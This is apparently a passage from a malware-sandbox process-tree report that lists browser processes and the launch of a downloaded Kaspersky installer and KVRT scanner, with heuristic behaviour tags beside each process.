                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:828
                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4516 /prefetch:8
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:5584
                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:5564
                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:4744
                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:208
                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5508 /prefetch:8
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:6124
                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:3444
                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5956 /prefetch:8
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:5484
                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5972 /prefetch:8
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:5140
                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5996 /prefetch:8
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                PID:4136
                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6024 /prefetch:8
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:3944
                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6044 /prefetch:8
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:4084
                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,11216286726392467421,5723274422575866625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3032 /prefetch:8
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                    PID:4384
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Downloads\kts21.3.10.391en_26099.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Downloads\kts21.3.10.391en_26099.exe"
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                    • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                    • Writes to the Master Boot Record (MBR)
                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                    • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                    PID:4228
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8C23DA78-4027-11ED-89AC-5EAE84113378\TEST_WPF.EXE
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\8C23DA78-4027-11ED-89AC-5EAE84113378\TEST_WPF.EXE" "C:\Users\Admin\AppData\Local\Temp\9150A5087204DE1198CAE5EA48113387\setup.dll"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      PID:1164
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\FD76F9E7-4027-11ED-89AC-5EAE84113378\GetSI.dll",SaveReportRunDllEntry "C:\Users\Admin\AppData\Local\Temp\FD76F9E7-4027-11ED-89AC-5EAE84113378\FD76F9E8-4027-11ED-89AC-5EAE84113378"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                      PID:464
                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://click.kaspersky.com/?hl=en&customization=&version=21.3.10.391&pid=PURE&syst=Microsoft Windows 10 x64 Edition (build 19041)&error=29100&link=AntiMalwareTools
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      • NTFS ADS
                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                                                                                                                                                                      PID:4760
                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd4,0x108,0x7fffe01c46f8,0x7fffe01c4708,0x7fffe01c4718
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:1160
                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                            PID:6140
                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:3552
                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:8
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:4984
                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4116
                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2996
                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5056 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:216
                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2088
                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2204
                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:916
                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6368 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4736
                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                PID:2980
                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6120
                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6700 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2196
                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                    PID:4580
                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff627cd5460,0x7ff627cd5470,0x7ff627cd5480
                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1260
                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6700 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1096
                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:4844
                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6572 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1528
                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4708
                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6764 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:3964
                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7036 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:668
                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7316 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:312
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:4672
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3384 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6892 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5468
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1328 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:6000
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6772 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1384
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,11046273918744062596,6541069748339898242,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3892 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3808
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Downloads\KVRT.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Downloads\KVRT.exe"
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                PID:1948
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\{2893f516-f7bc-40ce-8cfa-a5d795adffeb}\0748df24.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:/Users/Admin/AppData/Local/Temp/{2893f516-f7bc-40ce-8cfa-a5d795adffeb}/\0748df24.exe
                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                  • Sets service image path in registry
                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
